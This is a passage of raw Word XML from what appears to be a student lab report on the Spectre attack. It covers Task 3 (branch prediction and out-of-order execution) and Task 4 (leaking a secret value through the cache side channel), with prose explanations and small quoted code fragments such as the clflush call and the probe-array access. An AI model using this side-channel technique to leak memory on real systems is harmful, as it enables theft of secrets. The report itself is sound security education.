      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>accessing to the secret is much faster than accessing to other element in the array. Then we know which array element stores the secret. And we can get it. In this task, we change the threshold value to be 97 which is calculated in task1. As the screenshot1 shows, we only get one miss out of 20 times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5462C7E2" w14:textId="77777777" w:rsidR="00CD37E5" w:rsidRDefault="00CD37E5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B1D6642" w14:textId="77777777" w:rsidR="00281E86" w:rsidRDefault="00281E86">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41E8DF26" w14:textId="610D0461" w:rsidR="00281E86" w:rsidRPr="00A6203A" w:rsidRDefault="00281E86">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6203A">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Task3</w:t>
      </w:r>
      <w:r w:rsidR="00A6203A" w:rsidRPr="00A6203A">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>: Out-of-Order Execution and Branch Prediction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B3E2B6" w14:textId="77777777" w:rsidR="00A6203A" w:rsidRDefault="00A6203A">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B6DFA25" w14:textId="6DABF8F4" w:rsidR="00A6203A" w:rsidRDefault="00575113">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77A0917B" wp14:editId="7E782488">
            <wp:extent cx="4852035" cy="1802525"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="16" name="Picture 16" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%208.1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0-18%20at%208.13.4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5608" cy="1803852"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="621E7994" w14:textId="25C6F70E" w:rsidR="00575113" w:rsidRDefault="00575113">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screnshot1, we compile and</w:t>
      </w:r>
      <w:r w:rsidR="002353FB">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> run SpectreExperiment, and 97 is printed. So we execute the if true part even the if is false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506AD0E3" w14:textId="77777777" w:rsidR="002353FB" w:rsidRDefault="002353FB">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="234EEC2B" w14:textId="1F4C3775" w:rsidR="002353FB" w:rsidRDefault="002353FB">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7868F077" wp14:editId="6AAF1913">
            <wp:extent cx="4509135" cy="1399885"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="Picture 17" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%208.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0-18%20at%208.17.1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2051" cy="1400790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F83AF3" w14:textId="3CBCDB6F" w:rsidR="002353FB" w:rsidRPr="001C536C" w:rsidRDefault="002353FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">screenshot2, we comment out the </w:t>
      </w:r>
      <w:r w:rsidR="001C536C" w:rsidRPr="001C536C">
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:cs="MS Mincho"/>
        </w:rPr>
        <w:t>✰</w:t>
      </w:r>
      <w:r w:rsidR="001C536C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>part (_mm_clflush(&amp;size))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3095AC04" w14:textId="77777777" w:rsidR="002353FB" w:rsidRDefault="002353FB">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F4DB22" w14:textId="42F725D1" w:rsidR="002353FB" w:rsidRDefault="002353FB">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42C6893F" wp14:editId="6F3D63F2">
            <wp:extent cx="4509135" cy="1361139"/>
            <wp:effectExtent l="0" t="0" r="0" b="10795"/>
            <wp:docPr id="18" name="Picture 18" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%208.1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0-18%20at%208.19.0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2833" cy="1362255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A61EF87" w14:textId="396F0FE0" w:rsidR="002353FB" w:rsidRDefault="002353FB">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshoht3, 97 still can be printed after we comment out (_mm_clflush(&amp;size), but in a very low chance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9EFA3F" w14:textId="77777777" w:rsidR="004165BF" w:rsidRDefault="004165BF">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74C0D00D" w14:textId="3F40B180" w:rsidR="002353FB" w:rsidRDefault="002043AC">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="195E1A8A" wp14:editId="69298035">
            <wp:extent cx="4538738" cy="1374140"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="21" name="Picture 21" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%208.4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0-18%20at%208.47.5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2037" cy="1375139"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1022E98F" w14:textId="7B39CB02" w:rsidR="00A87F72" w:rsidRDefault="00A87F72">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot4, we change victim(97) to victim(i+20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732DFBD1" w14:textId="77777777" w:rsidR="00A87F72" w:rsidRDefault="00A87F72">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="462276F0" w14:textId="33663EEF" w:rsidR="00A87F72" w:rsidRDefault="00A87F72">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="477AEB86" wp14:editId="04692158">
            <wp:extent cx="5080635" cy="1383406"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="Picture 20" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%208.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0-18%20at%208.21.5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4749" cy="1384526"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5030E504" w14:textId="6E33A7CD" w:rsidR="00A87F72" w:rsidRDefault="00A87F72">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot5, 97 is not printed anymore, the attack fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E227B05" w14:textId="77777777" w:rsidR="00A87F72" w:rsidRDefault="00A87F72">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04B9FD36" w14:textId="392ED5CD" w:rsidR="00A87F72" w:rsidRPr="00A87F72" w:rsidRDefault="00A87F72">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A87F72">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Observation and Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CCDE8E" w14:textId="1EBDE02D" w:rsidR="00A87F72" w:rsidRDefault="00A87F72">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">In this task, we want to explore the feature of out-of-order execution of CPU. When there is branch condition, the CPU first need to load the </w:t>
      </w:r>
      <w:r w:rsidR="00A706DB">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">variable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">value in the condition statement, and then check the condition is true or false to decide take the branch or not. So CPU should follow the order load data, check data, make decision. However, this is not efficient, and it waste computer resource. In modern CPU, they do out-of-order execution, before the value is loaded and decision is made, CPU predict to take or not take the branch. If the prediction is wrong, then CPU discard the execution and remove any effect. </w:t>
      </w:r>
      <w:r w:rsidR="00BB262A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>For Intel CPU, t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hey remove effect in the register and memory, but they forget to remove the effect in the cache, so this cause problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78285103" w14:textId="5DA22388" w:rsidR="002043AC" w:rsidRDefault="00410FBD">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C7088D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">As screenshot1 shows, when we feed 97 to the victim() function, even 97 is large than 10, CPU still take the branch, so the </w:t>
      </w:r>
      <w:r w:rsidR="00BB262A" w:rsidRPr="00BB262A">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00C7088D" w:rsidRPr="00C7088D">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>temp = array[x * 4096 + DELTA];</w:t>
      </w:r>
      <w:r w:rsidR="00BB262A">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00C7088D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> is executed, and 97 is printed. Then we comment out </w:t>
      </w:r>
      <w:r w:rsidR="00BB262A" w:rsidRPr="00BB262A">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00C7088D" w:rsidRPr="00C7088D">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_mm_clflush(&amp;size);</w:t>
      </w:r>
      <w:r w:rsidR="00BB262A">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00C7088D">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C7088D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">in the program (screenshot2). </w:t>
      </w:r>
      <w:r w:rsidR="00BC3EB1">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>And</w:t>
      </w:r>
      <w:r w:rsidR="00C7088D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> we run the program again, this time 97 is </w:t>
      </w:r>
      <w:r w:rsidR="00BB262A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">still </w:t>
      </w:r>
      <w:r w:rsidR="00C7088D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>printed, but the chance is very low</w:t>
      </w:r>
      <w:r w:rsidR="007678F6">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1/8)</w:t>
      </w:r>
      <w:r w:rsidR="00C7088D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is because </w:t>
      </w:r>
      <w:r w:rsidR="000F0CAA">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r w:rsidR="00C7088D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB262A" w:rsidRPr="00BB262A">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00C7088D" w:rsidRPr="00C7088D">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_mm_clflush(&amp;size);</w:t>
      </w:r>
      <w:r w:rsidR="00BB262A">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00C7088D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to flush </w:t>
      </w:r>
      <w:r w:rsidR="00952650">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">out </w:t>
      </w:r>
      <w:r w:rsidR="006B27F2">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>the variable size from cache,</w:t>
      </w:r>
      <w:r w:rsidR="00C7088D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> CPU need to load </w:t>
      </w:r>
      <w:r w:rsidR="004165BF">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidR="00C7088D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> from memory, which cost </w:t>
      </w:r>
      <w:r w:rsidR="003E5C02">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>much</w:t>
      </w:r>
      <w:r w:rsidR="00C7088D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> time</w:t>
      </w:r>
      <w:r w:rsidR="00E02695">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, so CPU will do out-of-order execution</w:t>
      </w:r>
      <w:r w:rsidR="00C7088D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. Therefore, before branch execution is discarded, we have more time to run the code. However, if we do not flush </w:t>
      </w:r>
      <w:r w:rsidR="003E5C02">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">out </w:t>
      </w:r>
      <w:r w:rsidR="004165BF">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">variable </w:t>
      </w:r>
      <w:r w:rsidR="00C7088D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>size from cache, CPU can load its value from cache directly, which cost much less time. As a result,</w:t>
      </w:r>
      <w:r w:rsidR="00E02695">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> CPU may not need to do out-of-order execution, or it will discard the branch execution very quickly (before we execute the code inside if, the CPU has already realized the prediction is wrong and discarded the branch execution)</w:t>
      </w:r>
      <w:r w:rsidR="00C7088D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>. Therefore, 97 has very low chance to be printed out.</w:t>
      </w:r>
      <w:r w:rsidR="00463270">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002043AC">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">As screenshot 4 and 5 show, after we change victim(i) to victim(i+20), we fail in every time. This is because that </w:t>
      </w:r>
      <w:r w:rsidR="000559D2">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CPU will use a table to record the branch taken in past, and then it uses the table (past result) to predict branch taken or not. In this case, because we train CPU not to take branch (i+20 is greater then 10), when CPU perform out-of-order execution, it will choose to not taken</w:t>
      </w:r>
      <w:r w:rsidR="00BB262A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> the branch. So our attack fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B806787" w14:textId="77777777" w:rsidR="00BB262A" w:rsidRDefault="00BB262A">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5810594B" w14:textId="77777777" w:rsidR="00BB262A" w:rsidRDefault="00BB262A">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24AC1DB1" w14:textId="25E8B73D" w:rsidR="0027662B" w:rsidRPr="0027662B" w:rsidRDefault="0027662B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027662B">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Task4: The Spectre Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A05A71C" w14:textId="516F67C5" w:rsidR="0027662B" w:rsidRDefault="00B55C6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2433044B" wp14:editId="62E04978">
            <wp:extent cx="5932170" cy="3937000"/>
            <wp:effectExtent l="0" t="0" r="11430" b="0"/>
            <wp:docPr id="22" name="Picture 22" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%209.0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0-18%20at%209.01.5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170" cy="3937000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ECDD5D" w14:textId="69F7D69D" w:rsidR="00B55C6F" w:rsidRDefault="00B55C6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot1, we compile and run SpectreAttack, and the secret (83) is printed, but there is a lot of noise (0).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F1338D" w14:textId="77777777" w:rsidR="00B55C6F" w:rsidRDefault="00B55C6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3753A55B" w14:textId="2AE84DF1" w:rsidR="00B55C6F" w:rsidRPr="00B55C6F" w:rsidRDefault="00B55C6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B55C6F">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Observation and Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFB5493" w14:textId="0825A4D6" w:rsidR="00B55C6F" w:rsidRDefault="00B55C6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">In this task, we perform </w:t>
      </w:r>
      <w:r w:rsidR="00C329C7">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Spectre attack. The mechanism is similar as last task, we use the our-of-order execution and unremoved cache effect to steal the secret from a buffer. As the screensho1 shows, out attack is successful</w:t>
      </w:r>
      <w:r w:rsidR="00F923A1">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (secret 83 is printed)</w:t>
      </w:r>
      <w:r w:rsidR="00C329C7">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, but there is a lot of noise</w:t>
      </w:r>
      <w:r w:rsidR="009676CC">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (0)</w:t>
      </w:r>
      <w:r w:rsidR="0013688A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, so we cannot get correct result </w:t>
      </w:r>
      <w:r w:rsidR="00CF40E0">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>every time</w:t>
      </w:r>
      <w:r w:rsidR="00C329C7">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DC4AD0" w14:textId="77777777" w:rsidR="0013688A" w:rsidRDefault="0013688A">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="252ED2B9" w14:textId="77777777" w:rsidR="0013688A" w:rsidRDefault="0013688A">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592BE187" w14:textId="77777777" w:rsidR="00704B4F" w:rsidRDefault="00704B4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0377D808" w14:textId="77777777" w:rsidR="00704B4F" w:rsidRDefault="00704B4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A7522C" w14:textId="77777777" w:rsidR="00704B4F" w:rsidRDefault="00704B4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59081C5A" w14:textId="77777777" w:rsidR="00704B4F" w:rsidRDefault="00704B4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="273495A5" w14:textId="77777777" w:rsidR="00704B4F" w:rsidRDefault="00704B4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="275D9277" w14:textId="77777777" w:rsidR="00704B4F" w:rsidRDefault="00704B4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1056CFC9" w14:textId="1BF2D130" w:rsidR="0013688A" w:rsidRPr="00B67293" w:rsidRDefault="0013688A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B67293">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Task5: </w:t>
      </w:r>
      <w:r w:rsidR="00B67293" w:rsidRPr="00B67293">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Improve the Attack Accuracy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D82548F" w14:textId="7F70EA08" w:rsidR="00B67293" w:rsidRDefault="00B67293">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
